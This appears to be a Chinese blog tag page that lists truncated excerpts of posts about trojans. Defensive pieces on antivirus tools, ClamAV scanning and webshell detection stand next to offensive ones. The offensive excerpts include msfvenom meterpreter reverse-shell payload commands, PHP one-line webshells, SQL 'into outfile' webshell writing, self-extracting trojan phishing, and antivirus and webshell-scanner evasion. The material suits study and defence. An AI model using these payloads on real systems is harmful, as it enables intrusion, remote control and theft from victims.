木马

近日，白泽在使用 docker 的时候，开放了防火墙的端口，以 SSH 方式访问远程服务器的 docker 守护进程（无需使用密钥即可建立连接），随后竟遭到了挖矿木马的攻击！ ......

简述钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开信息搜集批量邮箱搜集https:/ ......

电脑杀毒软件（Antivirus Software），也称为反病毒软件，是一种用于保护计算机免受恶意软件、病毒、木马、间谍软件等威胁的安全工具。 它通过扫描、检测、清除和防御恶意软件，以确保计算机系统的安全性和稳定性。 当涉及选择电脑杀毒软件时，以下是一些在中国和国外备受认可的选项，以及它们的特点： ......

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 htt ......

Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=Your IP LPORT=Your Port -f elf -o ./shell.elf Windows msfvenom -p windows/meterpreter/revers ......

实验目的： 通过本实验，读者将学习到以下内容： （1）了解木马隐藏技术的基本原理 （2）提高木马攻击的防范意识 （3）学会木马防范的相关工具 注意：本实验在虚拟机上面进行，不准用于破坏他人计算机环境或诱导他人下载木马，本实验仅做学习交流，禁止一切非法行为，否则后果自负！ 实验环境 Win71虚拟机作 ......

作用是在Python中创建一个伪终端（pty），并在其中启动一个bash shell。这样，你可以在Python脚本中执行bash命令，就像在终端中一样。 python -c 'import pty; pty.spawn("/bin/bash")' 一句话木马： <?php @eval($_REQU ......

实验环境： 靶机Windows server 2003 192.168.242.129 攻击机kali 192.168.242.131 实验工具：Metasploit Framework(MSF) 实验过程： 确定攻击机和靶机之间连通性 利用msfvenom生成远控木马 msfvenom是msfpa ......

自解压捆绑木马 使用CS生成一个木马文件将木马跟一个正常的文件捆绑在一起，当点捆绑生成的EXE文件就会执行木马和正常的文件。 选中木马文件和一个正常的文件，选择添加到压缩文件 常规-勾选创建自解压格式压缩文件并修改压缩文件名 高级-点击自解压选项 常规-填写解压路径 设置-填写解压后运行的路径，一个 ......

https://www.secrss.com/articles/50209 Gh0st是一种远程控制软件，它可以在被攻击的计算机上运行并允许攻击者远程控制该计算机。为了查找Gh0st的进程、文件、注册表等信息，您可以采取以下步骤： 查找Gh0st的进程：打开任务管理器，查看正在运行的进程列表，如果发 ......

//生成加密后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.7 lport=9999 -f exe > -x notepad++.exe -o notepad++.exe //下载套壳工具 https://www.orea ......

前言 在攻防演练中，钓鱼攻击通常采用社会工程学手段，通过伪装成可信的来源，引导用户点击恶意链接或下载恶意文件，进而实现攻击。而使用压缩包自解压技术可以在一定程度上提高攻击成功率。其中包含的自解压木马就会被激活并感染用户的计算机，而在本篇文章中会介绍如何使用自解压木马技术钓鱼。 实战技术操作 第一步 ......

目录TrueUpdate白加黑木马分析保姆级教程0x00：前言TrueUpdate是什么？0x01: TrueUpdate逆向分析解压密码查壳脱壳分金定穴找到解压密码方法1：找到解压密码方法2：提取密码附近关键字特征0x02：揭开.dat真相0x03: 插入恶意代码(玩点好玩的)0x04：进入正题( ......

开篇前言 Linux服务器一直给我们的印象是安全、稳定、可靠，性能卓越。由于一来Linux本身的安全机制，Linux上的病毒、木马较少，二则由于宣称Linux是最安全的操作系统，导致很多人对Linux的安全性有个误解：以为它永远不会感染病毒、木马；以为它没有安全漏洞。所以很多Linux服务器都是裸奔 ......

本人已经本科毕业一年有余，在平常实习过程中，发现大佬都对我的本科毕设--双协议栈远控木马感兴趣。 据我所知，目前流行的C2远控软件 中，MSF支持IPv4和IPv6，但是MSF生成的单个木马只是支持其中的一种协议，而不是双协议栈。Cobalt Strike目前尚无IPv6的使用案例。其他支持双协议栈 ......

# into outfile直接写入木马文件 ## 使用条件： - 知道网站的绝对路径 - secure_file_priv不能为null - 拥有写入文件的权限 ## 使用方法： 利用into outfile写入木马文件 ``` select "" into outfile "D:\\phpstu ......

前言 本次分析使用了ChatGPT进行辅助分析，大大提升了工作效率，很快就分析出木马的工作流程和构造出利用方式。 分析 首先对该木马进行格式化,以增强代码的可读性。得到如下代码 <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1 ......

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document< ......

csharp的类： using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms; // Token: 0x02000009 RID: 9 public sealed class ......

virustotal VirusTotal是一个广泛使用的在线恶意软件分析平台，它提供了综合的文件和URL扫描服务。通过使用多个反病毒引擎和其他分析工具，VirusTotal能够检测和分析恶意软件、病毒、恶意URL和其他安全威胁。 VirusTotal的一些主要特点和功能：文件和URL扫描：Viru ......

样本md5：02B886B7B245F7CA52172F299D279A0F 问题：挖矿木马有时候可以启动，有时候起不来？WHY？逆向看看，结论： foreach (Process process3 in Process.GetProcesses()) { if (process3.ProcessN ......

向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将`executeHandler`从`handlers.go`拷贝到handlers_windows.go里,核心代码为 `cmd.SysProcAttr = &syscall.SysProcAttr{HideWin ......

各种语言的一句话木马 PHP 上传xx.php 内容： 1.<?php @eval($_POST['shell']);?> 2.<?php @eval($_GET['shell']);?> 3.<?php phpinfo();?> 4.<?php readfile('/flag');?>//读取文件 ......

直接访问界面 因为说是sql注入靶场肯定要有注入点的，当前页面没有发现注入点，可以去扫一下后台 发现有管理后台，然后尝试去用sqlmap跑，但是一跑就崩了，只能想办法手工注入，然后用了一句话密码绕过 ' or 1=1 # 登录到管理后台 发现有上传点，而且还可以上传php类型的文件 直接上传一句话木 ......

一句话木马绕过D盾查杀 关于eval函数 eval是⼀个语⾔构造器⽽不是⼀个函数，不能被可变函数 调⽤可变函数：通过⼀个变量，获取其对 应的变量值，然后通过给该值增加⼀个括号()，让系统认为该值是⼀个函数，从⽽当做函数来执⾏ 通俗的说⽐如你&lt;?php$a=eval;$a()?&gt;这样是不⾏ ......

``` Title ``` ......

生成sliver木马多个步骤合成一个sh ``` #!/bin/bash # date: 20230222 host_ip=$1 WORK_DIR=/opt/work rm -rf /root/.sliver-client/ cd ${WORK_DIR}/sliver rm -rf adjectiv ......

本代码适合查找网站挂马(木马)文件使用 <?php function listPhpFiles($directory) { $fileList = []; $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator ......

一、题目链接 http://a.y1ng.vip:1126/chopper/ 二、题意解析 打开网址，发现网页提示： 明显是一个一句话木马的语句，而且可以猜测网页后台已经有php木马文件，我们只需要连接上就行。 三、解题步骤 使用antSword等Webshell管理工具，来对该后门程序进行链接： ......

linux系统中了木马怎么办？通过clamav工具扫描 # yum install -y clamav #安装 # freshclam -v #更新病毒库 # clamscan -r --bell -i /|grep FOUND #对根目录进行扫描 ......